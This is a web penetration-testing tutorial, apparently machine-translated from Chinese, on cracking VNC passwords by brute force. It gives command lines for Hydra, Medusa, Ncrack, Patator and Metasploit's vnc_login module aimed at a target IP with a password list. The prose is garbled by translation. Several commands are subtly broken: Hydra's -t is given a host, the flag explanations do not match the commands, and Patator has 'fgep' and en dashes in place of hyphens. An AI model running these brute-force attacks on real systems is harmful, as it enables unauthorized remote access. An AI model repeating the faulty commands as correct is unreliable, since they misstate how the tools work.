Web penetration test - 5. Brute force cracking vulnerability - (6) VNC password cracking

Virtual network console (Virtual Network Console：VNC) Is an excellent remote control tool software , By the famous AT&T Developed by the European research laboratory .VNC It's based on UNIX and Linux Free open source software for operating system , Remote control is powerful , Efficient and practical , Its performance can be compared with Windows and MAC Any remote control software in is comparable to . stay Linux in ,VNC There are four commands ：vncserver,vncviewer,vncpasswd, and vncconnect. In most cases, the user only needs two of these commands ：vncserver and vncviewer.
Default port ：5900

One 、hydra

Hydra Is a parallel login cracker , It supports multiple attack protocols . It's very fast and flexible , And new modules are easy to add .kali Toolset integrated .

hydra Project address ：https://github.com/vanhauser-thc/thc-hydra/releases Full version

hydra Support ：
Cisco AAA、Cisco auth、Cisco enable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)-HEAD、HTTP- agent 、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、Oracle The listener 、Oracle SID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin、Rsh、SIP、SMB(NT) 、SMTP、SMTP enumeration 、SNMP v1+v2+v3、SOCKS5、SSH（v1 and v2）、SSHKEY、Subversion、Teamspeak (TS2)、Telnet、VMware-Auth、VNC and XMPP`.

hydra -s 5900 –P /root/Desktop/pass.txt –t IP vnc

-P： Indicates the path to the password list
-s： Indicates the destination port number
-t： Run in parallel TASKS The number of connections

Two 、Medusa

Medusa It's a fast one 、 A parallel and modular login brute force cracker . The goal is to support as many services as possible that allow remote authentication .kalikali Toolset integrated .

file ：
www.foofus.net/jmk/medusa/medusa.html
Source code ：
https://github.com/jmk-foofus/medusa
https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz

The main functions are as follows ：
1、 Thread based parallel testing ： It can target multiple hosts at the same time 、 The user or password performs a brute force test .
2、 Flexible user input ： Target information can be specified in a number of ways （ host / user / password ）. for example , Each item can be a single item , It can also be a file that contains multiple entries . Besides , The combined file format allows users to refine their target list .
3、 Modular design ： Each service module acts as an independent .mod File exists . This means that the list of supported services can be extended for brute force cracking without any modification to the core application .
4、 Support multiple protocols ： Many services are currently supported （ for example SMB、HTTP、POP3、MS-SQL、SSHv2 etc. ）.

medusa -h 192.168.0.6 –u root -P /root/Desktop/pass.txt –M vnc

-U： Indicates the path to the user name list
-P： Indicates the path to the password list
-M： Specify the burst parameter type

3、 ... and 、Ncrack

Ncrack Is a high-speed network authentication cracking tool . It aims to help companies protect their networks by proactively testing all their hosts and network devices for password errors .Ncrack Is to use a modular approach 、 Be similar to Nmap Command line syntax and dynamic engine design that can adjust its behavior according to network feedback . It allows fast and reliable large-scale auditing of multiple hosts .kali Toolset integrated .

Ncrack The functionality of the includes a very flexible interface , Allow users to have complete control over network operations , Allow very complex brute force attacks , Easy to use timing templates , Be similar to Nmap The runtime interaction of . Supported protocols include SSH、RDP、FTP、Telnet、HTTP(S)、Wordpress、POP3(S)、IMAP、CVS、SMB、VNC、SIP、Redis、PostgreSQL、MQTT、MySQL、MSSQL、MongoDB、Cassandra、WinRM、OWA , and DICOM

Project address ：https://nmap.org/ncrack/

ncrack -V --user root -P /root/Desktop/pass.txt IP:5900

-U： Indicates the path to the user name list
-P： Indicates the path to the password list
-v： Increase the level of detail （ Use twice or more for better results ）

Four 、Patator

Patator For the use of Hydra、Medusa、Ncrack、Metasploit Module and Nmap NSE The script is written to thwart password guessing attacks . I chose a different approach , So as not to create another brute force cracking tool and avoid repeating the same shortcomings .Patator It's a use. Python Write multithreading tools , It strives to be more reliable and flexible than its predecessors .

Project address ：https://github.com/lanjelot/patator

patator vnc_login host=IP password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0

5、 ... and 、Metasploit

use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts IP
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run